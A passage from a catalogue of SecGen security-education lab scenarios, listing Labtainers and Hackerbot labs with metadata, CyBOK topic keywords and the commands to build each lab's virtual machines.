Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authorisation access control
Network Security (NS) PENETRATION TESTING PENETRATION TESTING - NETWORK MAPPING - PING

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/nix-commands.xml run

View source

labtainers/nmap-discovery.xml

Details

Key Data
Name Labtainers lab: nmap-discovery
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) PENETRATION TESTING PENETRATION TESTING - NETWORK MAPPING - FINGERPRINTING; PENETRATION TESTING - NETWORK MAPPING - NMAP

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/nmap-discovery.xml run

View source

labtainers/nmap-ssh.xml

Details

Key Data
Name Labtainers lab: nmap-ssh
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) PENETRATION TESTING PENETRATION TESTING - NETWORK MAPPING - FINGERPRINTING; PENETRATION TESTING - NETWORK MAPPING - NMAP
Security Operations & Incident Management (SOIM) CM (CONFIGURATION MANAGEMENT) SSH (SECURE SHELL)

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/nmap-ssh.xml run

View source

labtainers/onewayhash.xml

Details

Key Data
Name Labtainers lab: onewayhash
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authentication user authentication; Cryptography and authentication (hashes and attacks against authentication schemes / passwords)
Applied Cryptography (AC) Public-Key Cryptography symmetric encryption and authentication; MESSAGE AUTHENTICATION CODE (MAC)
Forensics (F) Artifact Analysis cryptographic hashing

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/onewayhash.xml run

View source

labtainers/packet-introspection.xml

Details

Key Data
Name Labtainers lab: packet-introspection
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Forensics (F) Main Memory Forensics network connections; data recovery and file content carving
Security Operations & Incident Management (SOIM) Monitor: Data Sources network traffic

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/packet-introspection.xml run

View source

labtainers/pass-crack.xml

Details

Key Data
Name Labtainers lab: pass-crack
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Forensics (F) Artifact Analysis cryptographic hashing
Software Security (SS) Authentication user authentication; Cryptography and authentication (hashes and attacks against authentication schemes / passwords)

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/pass-crack.xml run

View source

labtainers/pcapanalysis.xml

Details

Key Data
Name Labtainers lab: pcapanalysis
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Forensics (F) Main Memory Forensics network connections
Network Security (NS) OSI (OPEN SYSTEM INTERCONNECT) MODEL APPLICATION LAYER; DATA LINK LAYER; NETWORK LAYER
Security Operations & Incident Management (SOIM) Monitor: Data Sources PCAP; network traffic

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/pcapanalysis.xml run

View source

labtainers/plc-app.xml

Details

Key Data
Name Labtainers lab: plc-app
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems characteristics; security and privacy concerns
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems Domains industrial control systems

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/plc-app.xml run

View source

labtainers/plc-forensics-adv.xml

Details

Key Data
Name Labtainers lab: plc-forensics-adv
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems characteristics; security and privacy concerns
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems Domains industrial control systems

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/plc-forensics-adv.xml run

View source

labtainers/plc-forensics.xml

Details

Key Data
Name Labtainers lab: plc-forensics
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems characteristics; security and privacy concerns
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems Domains industrial control systems

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/plc-forensics.xml run

View source

labtainers/plc.xml

Details

Key Data
Name Labtainers lab: plc
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems characteristics; security and privacy concerns
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems Domains industrial control systems

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/plc.xml run

View source

labtainers/pubkey.xml

Details

Key Data
Name Labtainers lab: pubkey
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Applied Cryptography (AC) Algorithms, Schemes and Protocols TLS
Network Security (NS) Internet Architecture transport layer security

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/pubkey.xml run

View source

labtainers/radius.xml

Details

Key Data
Name Labtainers lab: radius
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authentication identity management; user authentication; facets of authentication; authentication in distributed systems
Network Security (NS) Internet Architecture link layer security

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/radius.xml run

View source

labtainers/remote-dns.xml

Details

Key Data
Name Labtainers lab: remote-dns
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) Network Protocols and Vulnerability ADDRESS RESOLUTION PROTOCOL(ARP); ARP (ADDRESS RESOLUTION PROTOCOL); ARP SPOOFING; DNS ATTACKS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/remote-dns.xml run

View source

labtainers/retlibc.xml

Details

Key Data
Name Labtainers lab: retlibc
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Software Security (SS) Categories of Vulnerabilities memory management vulnerabilities; Stack smashing buffer overflows
Software Security (SS) Mitigating Exploitation NON-EXECUTABLE MEMORY
Malware & Attack Technology (MAT) Attacks and exploitation EXPLOITATION; EXPLOITATION FRAMEWORKS; Exploit development; Metasploit Framework development; Mitigation bypass: non-executable memory

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/retlibc.xml run

View source

labtainers/routing-basics.xml

Details

Key Data
Name Labtainers lab: routing-basics
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) Internet Architecture network layer security

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/routing-basics.xml run

View source

labtainers/routing-basics2.xml

Details

Key Data
Name Labtainers lab: routing-basics2
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) Internet Architecture network layer security

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/routing-basics2.xml run

View source

labtainers/setuid-env.xml

Details

Key Data
Name Labtainers lab: setuid-env
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authorisation access control; Elevated privileges; Real and effective identity; Vulnerabilities and attacks on access control misconfigurations
Operating Systems & Virtualisation (OSV) Primitives for Isolation and Mediation Access controls and operating systems; Linux security model; Unix File Permissions; setuid/setgid

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/setuid-env.xml run

View source

labtainers/snort.xml

Details

Key Data
Name Labtainers lab: snort
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Security Operations & Incident Management (SOIM) Monitor: Data Sources network traffic
Security Operations & Incident Management (SOIM) Analyse: Analysis Methods misuse detection; anomaly detection
Security Operations & Incident Management (SOIM) Execute: Mitigation and Countermeasures intrusion prevention systems
Network Security (NS) Network Defence Tools packet filters; intrusion detection systems; IDS rules creation
Malware & Attack Technology (MAT) Malware Detection attack detection

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/snort.xml run

View source

labtainers/softplc.xml

Details

Key Data
Name Labtainers lab: softplc
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems characteristics; security and privacy concerns
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems Domains industrial control systems

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/softplc.xml run

View source

labtainers/softplc2.xml

Details

Key Data
Name Labtainers lab: softplc2
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems characteristics; security and privacy concerns
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems Domains industrial control systems

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/softplc2.xml run

View source

labtainers/sql-inject.xml

Details

Key Data
Name Labtainers lab: sql-inject
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Software Security (SS) Categories of Vulnerabilities Web vulnerabilities / OWASP Top 10; API vulnerabilities
Software Security (SS) Prevention of Vulnerabilities coding practices; Protecting against session management attacks; XSS; SQLi; CSRF; API design
Web & Mobile Security (WAM) Server-Side Vulnerabilities and Mitigations injection vulnerabilities; server-side misconfiguration and vulnerable components; SQL-INJECTION

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/sql-inject.xml run

View source

labtainers/ssh-agent.xml

Details

Key Data
Name Labtainers lab: ssh-agent
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Applied Cryptography (AC) Public-Key Cryptography public-key encryption; public-key signatures

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/ssh-agent.xml run

View source

labtainers/sshlab.xml

Details

Key Data
Name Labtainers lab: sshlab
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Applied Cryptography (AC) Public-Key Cryptography public-key encryption; public-key signatures

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/sshlab.xml run

View source

labtainers/ssl.xml

Details

Key Data
Name Labtainers lab: ssl
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Applied Cryptography (AC) Public-Key Cryptography public-key encryption; public-key signatures
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems characteristics; security and privacy concerns
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems Domains industrial control systems

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/ssl.xml run

View source

labtainers/symkeylab.xml

Details

Key Data
Name Labtainers lab: symkeylab
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Applied Cryptography (AC) Algorithms, Schemes and Protocols AES
Applied Cryptography (AC) Symmetric Cryptography symmetric primitives; symmetric encryption and authentication

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/symkeylab.xml run

View source

labtainers/sys-log.xml

Details

Key Data
Name Labtainers lab: sys-log
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Security Operations & Incident Management (SOIM) Monitor: Data Sources application logs: web server logs and files; system and kernel logs; Syslog

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/sys-log.xml run

View source

labtainers/tcpip.xml

Details

Key Data
Name Labtainers lab: tcpip
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) Internet Architecture transport layer security
Network Security (NS) Network Protocols and Vulnerability common network attacks

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/tcpip.xml run

View source

labtainers/telnetlab.xml

Details

Key Data
Name Labtainers lab: telnetlab
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) REMOTE ACCESS TELNET
Network Security (NS) TCP/IP SSH (SECURE SHELL); TELNET; TERMINAL EMULATION PROTOCOL (TELNET)

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/telnetlab.xml run

View source

labtainers/vpnlab.xml

Details

Key Data
Name Labtainers lab: vpnlab
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) Network Defence Tools VIRTUAL - PRIVATE NETWORK (VPN)

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/vpnlab.xml run

View source

labtainers/vpnlab2.xml

Details

Key Data
Name Labtainers lab: vpnlab2
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) Network Defence Tools VIRTUAL - PRIVATE NETWORK (VPN)

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/vpnlab2.xml run

View source

labtainers/webtrack.xml

Details

Key Data
Name Labtainers lab: webtrack
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Forensics (F) WEB WEB BROWSERS
Web & Mobile Security (WAM) Fundamental Concepts and Approaches BROWSER; cookies

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/webtrack.xml run

View source

labtainers/wireshark-intro.xml

Details

Key Data
Name Labtainers lab: wireshark-intro
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Security Operations & Incident Management (SOIM) Monitor: Data Sources network traffic

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/wireshark-intro.xml run

View source

labtainers/xforge.xml

Details

Key Data
Name Labtainers lab: xforge
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Web & Mobile Security (WAM) Server-Side Vulnerabilities and Mitigations CROSS-SITE REQUEST FORGERY (CSRF)
Software Security (SS) Prevention of Vulnerabilities Protecting against session management attacks; XSS; SQLi; CSRF

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/xforge.xml run

View source

labtainers/xsite.xml

Details

Key Data
Name Labtainers lab: xsite
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Web & Mobile Security (WAM) Server-Side Vulnerabilities and Mitigations CROSS-SITE SCRIPTING (XSS)
Software Security (SS) Prevention of Vulnerabilities Protecting against session management attacks; XSS; SQLi; CSRF

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/xsite.xml run

View source

response_and_investigation/1_integrity_protection.xml

Details

Key Data
Name Integrity protection lab
Description
Introduction
This lab addresses preserving the integrity of your digital assets. In today's data-driven world, ensuring the accuracy and reliability of information is of utmost importance. Unauthorized changes, whether intentional or accidental, can lead to significant data breaches and compromise the trustworthiness of your system. This lab is designed to provide you with essential knowledge and practical skills to fortify the security of your data by exploring key theoretical concepts like file permissions, file attributes, and read-only filesystems.

Throughout this lab, you will engage in practical exercises to grasp fundamental principles of data integrity protection. You'll explore the use of file attributes to restrict access and protect sensitive information. Furthermore, you'll discover the utility of read-only filesystems by mounting directories in read-only mode, ensuring that changes cannot be made to critical system files. By completing these exercises and challenges, you will acquire the skills to protect your system's integrity, thereby bolstering your cybersecurity proficiency and enhancing your ability to maintain data confidentiality and availability.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://www.youtube.com/watch?v=sv1pHuuoW9g; https://www.youtube.com/watch?v=grISRv-CuHE
VM names desktop; hackerbot_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authorisation access control; Protecting integrity
Operating Systems & Virtualisation (OSV) Primitives for Isolation and Mediation Linux read only protections: ro mounts; file attributes

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/response_and_investigation/1_integrity_protection.xml run

View source

response_and_investigation/2_integrity_detection.xml

Details

Key Data
Name Integrity detection lab
Description
Introduction
Integrity management is a crucial aspect of information security, focusing on preventing and detecting unauthorized changes to resources, such as files and configurations, within a computer system. Maintaining the integrity of these resources is vital in ensuring the trustworthiness of a system, as any unauthorized changes can lead to security breaches and data corruption. This lab sheet delves into the various techniques for detecting changes to system integrity, including the use of backups, file hashing, and package verification. It emphasizes the importance of these methods in safeguarding the integrity of a system and provides hands-on exercises to demonstrate their practical application.

In this lab, you will learn about different strategies for detecting unauthorized changes. You will create and compare backups of critical system files, generate and compare file hashes using tools like md5sum and sha1deep, and explore the concept of package verification to check the integrity of installed software packages. You will face challenges from Hackerbot, where you'll apply the learned techniques to detect and respond to various security threats, such as detecting new users, changes to config files, and replaced binary files with malware. This hands-on experience will equip you with the skills and knowledge needed to protect and maintain the integrity of a computer system, a fundamental component of effective information security.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://www.youtube.com/watch?v=qzyEdeQ_7ZY; https://www.youtube.com/watch?v=kz7m-iyzSOw
VM names desktop; hackerbot_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Forensics (F) Artifact Analysis cryptographic hashing
Security Operations & Incident Management (SOIM) Monitor: Data Sources MONITORING - FILE INTEGRITY CHECKERS
Operating Systems & Virtualisation (OSV) OS Hardening code and data integrity checks

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/response_and_investigation/2_integrity_detection.xml run

View source

response_and_investigation/3_backups_and_recovery.xml

Details

Key Data
Name Backups lab
Description
Introduction
This lab focuses on the critical aspect of contingency planning in the context of cybersecurity and data management. It highlights the importance of maintaining data availability and system reliability, especially when dealing with potential disasters and security incidents. The lab delves into practical strategies for creating reliable backups, understanding recovery procedures, and implementing backup solutions using the powerful rsync command.

In this lab, you will learn how to utilize SSH/SCP for secure file transfer, create full, differential, and incremental backups using the rsync tool, and employ backups for efficient data protection. You will also explore the concept of snapshot backups, which allow for efficient storage of data by using hard links to unchanged files. Throughout the lab, you will engage in hands-on tasks such as copying directories, performing backups, restoring files, and setting up remote backups. By completing these exercises, you will gain valuable skills in contingency planning and data backup strategies, which are essential for maintaining the availability and security of critical systems and data.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

Tips for the lab

This resource is really really useful for understanding what happens when using Rsync depending on whether you include or don't include a slash at the end of a path, which often catches people out.

This lab needs to be completed in order.

Manually check you have done your backups correctly before telling Hackerbot you are ready. It may be a good idea to ssh to your backup server in a separate console tab ssh IP-ADDRESS (but do keep an eye on which system you are running each command on!).

Keep an eye on the trailing slashes in rsync commands and how it changes the behaviour (the difference between copying a directory or it's contents).

Each time you can test that your rsync command is going to do what you expect by adding -n to the command, which does a "Dry Run" without making any of the actual changes -- once you are happy it's making the changes you expect, run it again without the -n

Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/lak1Sued4GY; https://youtu.be/stVomGROfbQ; https://youtu.be/n8IKEJUOISY
VM names desktop; backup_server; hackerbot_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Security Operations & Incident Management (SOIM) Execute: Mitigation and Countermeasures Recover data and services after an incident; BACKUP - DIFFERENTIAL; BACKUP - INFERENTIAL

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/response_and_investigation/3_backups_and_recovery.xml run

View source

response_and_investigation/4_ids.xml

Details

Key Data
Name IDS lab
Description
Introduction
Intrusion Detection and Prevention Systems (IDS/IPS) are crucial components of network security, helping organizations monitor and defend against malicious activities and unauthorized access. This lab focuses on network monitoring basics and hands-on experience with tools like Tcpdump, Wireshark, and Snort, all useful for detecting and responding to potential threats. Network monitoring is a foundational practice in cybersecurity, as it allows you to observe network traffic and identify any suspicious or unwanted behavior. In this lab, you will gain practical experience by monitoring live network traffic, setting up Snort to detect network attacks, and analyzing the captured data. By the end of this lab, you will have a better understanding of how IDS/IPS systems work and how to configure and use them effectively to enhance network security.

During this hands-on lab, you will learn how to set up network monitoring tools like Tcpdump and Wireshark to observe live network traffic. You will use these tools to detect specific strings in network packets and identify port scanning attempts on a web server. Additionally, you will configure Snort, a popular IDS, to monitor network traffic to detect network activities of interest. As part of your practical exercises, you will trigger Snort alerts by sending ICMP pings and monitor the alerts generated. Throughout the lab, you will also interact with Hackerbot, which will simulate network attacks, and you will need to use the tools you've learned to detect and respond to these simulated attacks. By completing these tasks, you will develop practical skills in network monitoring and intrusion detection.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/raR0HstMnjg; https://youtu.be/3oDVTSFhl8Y; https://youtu.be/M6MisvbU32M
VM names desktop; ids_monitor; web_server; hackerbot_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Security Operations & Incident Management (SOIM) Monitor: Data Sources network traffic
Security Operations & Incident Management (SOIM) Analyse: Analysis Methods misuse detection; anomaly detection
Security Operations & Incident Management (SOIM) Execute: Mitigation and Countermeasures intrusion prevention systems
Network Security (NS) Network Defence Tools packet filters; intrusion detection systems
Malware & Attack Technology (MAT) Malware Detection attack detection

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/response_and_investigation/4_ids.xml run

View source

response_and_investigation/5_ids_rules.xml

Details

Key Data
Name IDS rules lab
Description
Introduction
In this lab on Intrusion Detection and Prevention Systems, you will delve into the world of network security, learning how to configure and monitor a network using Snort, a popular open-source intrusion detection system. This lab will guide you through the process of setting up Snort, and creating custom intrusion detection rules.

Throughout this lab, you will gain hands-on experience in configuring Snort to monitor network traffic. You will learn how to create custom Snort rules to detect specific network activities, and use Wireshark to capture and analyze network packets. The lab will also present you with a series of Hackerbot challenges, where you will apply your knowledge to detect and respond to various network attacks. For example, you will create Snort rules to detect attempts to access specific ports, monitor unencrypted email authentication, and more. By the end of this lab, you will have a solid understanding of intrusion detection and prevention systems, as well as practical experience in configuring and monitoring them to safeguard your network from potential threats.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/ZUMBsMppsLo; https://youtu.be/nuUm4NO_S1s
VM names desktop; ids_monitor; web_server; hackerbot_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Security Operations & Incident Management (SOIM) Monitor: Data Sources network traffic
Security Operations & Incident Management (SOIM) Analyse: Analysis Methods misuse detection; anomaly detection
Network Security (NS) Network Defence Tools packet filters; intrusion detection systems; IDS rules creation
Malware & Attack Technology (MAT) Malware Detection attack detection

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/response_and_investigation/5_ids_rules.xml run

View source

response_and_investigation/6_exfiltration_detection.xml

Details

Key Data
Name Exfiltration detection lab
Description
Introduction
In this lab, you will delve into the critical realm of Data Loss Prevention (DLP) and exfiltration detection. Data loss prevention is a vital cybersecurity practice aimed at safeguarding sensitive information from unauthorized access or leakage. It is highly relevant in today's digital age, where data breaches and insider threats pose significant risks to organizations. This lab provides you with hands-on experience in setting up and configuring Snort, a popular Intrusion Detection System (IDS), to monitor network traffic and detect the unauthorized transfer of sensitive data.

In this lab, you will learn how to configure Snort to detect unauthorized data transfers and exfiltration. By editing Snort configuration files, you will set up monitoring rules that trigger alerts when sensitive data, like credit card details and national insurance numbers, are being transported over the network. You will also extend your rule to detect the transfer of a fake data file so that your rules are effective without revealing the actual sensitive content. To accomplish this, you'll explore various Snort rule techniques, such as text-based, regular expression-based, and hash-based matching, gaining an in-depth understanding of data loss prevention strategies. By the end of the lab, you'll have practical experience in setting up DLP measures using Snort, a valuable skill for protecting an organization's sensitive data assets.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/4zYn4hbwKYQ; https://youtu.be/Y32tmFrCEBk
VM names desktop; ids_monitor; web_server; hackerbot_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Forensics (F) Artifact Analysis cryptographic hashing
Security Operations & Incident Management (SOIM) Monitor: Data Sources network traffic
Security Operations & Incident Management (SOIM) Analyse: Analysis Methods Exfiltation detection / data loss prevention
Network Security (NS) Network Defence Tools packet filters; intrusion detection systems; intrusion prevention systems; IDS rules creation

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/response_and_investigation/6_exfiltration_detection.xml run

View source

response_and_investigation/7_live_analysis.xml

Details

Key Data
Name Live analysis lab
Description
Introduction
In this lab, you will dive into the world of digital forensics and incident response by investigating a potentially compromised server. Security breaches and compromises are a common occurrence in the digital age, and it's essential to understand how to analyze and gather evidence from a compromised system to determine the extent of the intrusion and identify potential threats. This lab will walk you through the process of live system analysis, using both standard Unix commands and tools provided by the FIRE (Forensic and Incident Response Environment) CD/DVD ISO, in order to collect volatile data and assess the system's security.

Throughout this hands-on lab, you will learn essential techniques for live system analysis, such as collecting information about running processes, network connections, kernel modules, and system state. You will also explore the use of static binaries to avoid potential tampering with dynamically linked executables. Additionally, you will employ tools like Chkrootkit to detect rootkits and perform offline analysis to uncover any suspicious activity or security breaches. By completing tasks such as creating a list of suspicious open ports, identifying unreported processes, and analyzing the output of data collection scripts, you will gain practical experience in investigating compromised systems, a crucial skill for cybersecurity professionals and digital forensics experts.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/aNvVtF437LI; https://www.youtube.com/watch?v=iUInvMrBw3k; https://youtu.be/9nyvtJRQ17w
VM names desktop; hackerbot_server; compromised_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Forensics (F) Main Memory Forensics process information; file information; network connections; artifacts and fragments; challenges of live forensics
Operating Systems & Virtualisation (OSV) OS Hardening anomaly detection
Authentication, Authorisation & Accountability (AAA) Accountability The fallibility of digital evidence to tampering
Malware & Attack Technology (MAT) Malware Detection identifying the presence of malware

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/response_and_investigation/7_live_analysis.xml run

View source

response_and_investigation/8_dead_analysis.xml

Details

Key Data
Name Dead analysis lab
Description
Introduction
In this lab, you will delve into the world of digital forensics and offline analysis by examining a compromised system to uncover evidence of a security breach. This lab provides a hands-on experience with various forensic tools and techniques to investigate a compromised server. You will explore key theoretical concepts such as integrity management, log analysis, file recovery, and timeline reconstruction to piece together the events leading to the system compromise.

